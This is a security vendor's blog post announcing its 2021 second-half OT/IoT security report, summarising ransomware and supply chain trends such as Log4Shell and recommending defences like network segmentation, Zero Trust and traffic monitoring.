New OT/IoT Security Report: Trends and Countermeasures for Critical Infrastructure Attacks

New OT/IoT Security Report: Trends and Countermeasures for Critical Infrastructure Attacks

In our latest OT/IoT Security Report, Nozomi Networks Labs brings together an in-depth analysis of industry trends and our own security research findings.

The 2021 2H report is designed to help security teams and researchers protect their ICS and OT/IoT environments. It focuses on three main areas: trends in attacks, vulnerability research, and best practices in remediation efforts and technology.

We include a deeper dive into ransomware attacks over the past six months, and our own research into security camera and supply chain vulnerabilities. You’ll also learn more about remediation measures including attack surface reduction, the role of Zero Trust in modern OT/IoT networks, and techniques for analyzing device firmware for vulnerabilities.

Read on to learn about some of the highlights in our semi-annual report.

Supply Chain Attacks Offer the Greatest Opportunity to Spread Damage Quickly

Supply chain attacks have the potential to disrupt thousands of organizations, depending on how broadly a common software component is used, and the ease with which a vulnerability can be exploited. The first widely reported supply chain attack occurred over a year ago when a SolarWinds vulnerability compromised dozens of critical network operations across industries and the federal government. Since then, we have seen more attention in this area, along with growing concerns and actual vulnerabilities and exploits in open-source code.

When vulnerabilities are announced in open-source software, which can be used by many applications, the damage can be just as, or even more, extensive than single-vendor software. It depends on how widely used the library component is. This was the case with the December disclosure of the Log4Shell vulnerability. Log4Shell was found in the Apache Log4j (pronounced log-forge) open-source logging library, widely used in commercial applications and large online platforms. Due to the simplicity of this exploit, attackers were able to quickly launch attacks ahead of remediation and patch efforts across the globe. One of the largest ransomware groups was able to use the exploit within a week, executing an attack against VMware vCenter deployments.

Our research on Log4j is a key focus area in the latest OT/IoT Security Report, along with other notable ransomware and supply chain attacks that occurred in 2021 2H.

Ransomware and supply chain attacks dominated the headlines in 2021 2H
Ransomware and supply chain attacks dominated the headlines in 2021 2H.

Nozomi Networks Labs’ Vulnerability Research Focuses on OT/IoT Devices and Networks

OT and IoT devices are the primary research area for Nozomi Networks Labs. In the last several years, IoT devices have become a common entry point to the entire network and are often overlooked compared to widely deployed IT platforms and operating systems. IoT devices often run stripped-down operating systems with security features removed due to power and cost constraints. While OT systems such as SCADA and ICS equipment could once rely on air gaps between Wi-Fi, the internet, and the larger IT cloud network, that is no longer the case. Security defenses need to be shored up accordingly.

Our OT/IoT Security report highlights some of our key research areas, including vulnerabilities within supply chains, cloud platforms, and specific enterprise software platforms. In addition to reviewing some of the most impactful vulnerability disclosures made by the Labs team over the second half of 2021, we cover research regarding the attack surface of surveillance systems, and what asset owners should keep in mind before deploying them within a network.

Best Practices Against Today’s Emerging Threats

Shoring up cyber defenses in OT and IoT environments requires a multi-pronged approach that often includes complementary technologies, well-defined oversight and processes, and necessary security hygiene. Too often, overburdened security teams allow human error to compromise even the most advanced defenses with weak passwords, misconfigured networks and devices, or social engineering. Many ransomware attacks begin with a naïve user clicking on a malicious email link in an otherwise well-defended network.

Network segmentation is another fundamental component of a cyber defense strategy designed to prevent the spread of malware to critical applications and OT processes. Several technologies are useful to segment networks, such as VLANs and firewalls depending on the environment and policy requirements. In OT networks, the Purdue Model is one way of creating network zones that align with process elements and system function. However, too often we encounter organizations with completely flat networks (minimal segmentation), where easily compromised systems with mission-critical applications and processes have little or no isolation.

We make suggestions for increasing network segmentation in the OT/IoT Security Report, all the way to a Zero Trust model. Also known as micro-segmentation, Zero Trust implies all network connectivity between individual endpoints is denied except those connections which are explicitly allowed. In migrating to a Zero Trust model, it is important to monitor traffic patterns. This allows you to understand how legitimate traffic flows through the organization before specifying explicitly authorized connections to avoid disruptions.

We further discuss the importance of monitoring traffic to detect potential security threats, breaches and other anomalies in both network flows and OT processes. Finally, we cover attack surface reduction and what can be effectively achieved with reasonable effort.

Key Takeaways from the OT/IoT Security Report 2H 2021

By providing insights into key areas of the threat and vulnerability landscape, this security report aims to help organizations assess and enhance their security posture. We encourage companies to move forward by improving OT/IoT visibility, security, and monitoring. With the sophistication and ruthlessness of today’s adversaries, it is also important to adopt a post-breach mindset. Continuous advancement of your IT/OT security posture is the best way to ensure the availability, safety, and confidentiality of your operational systems.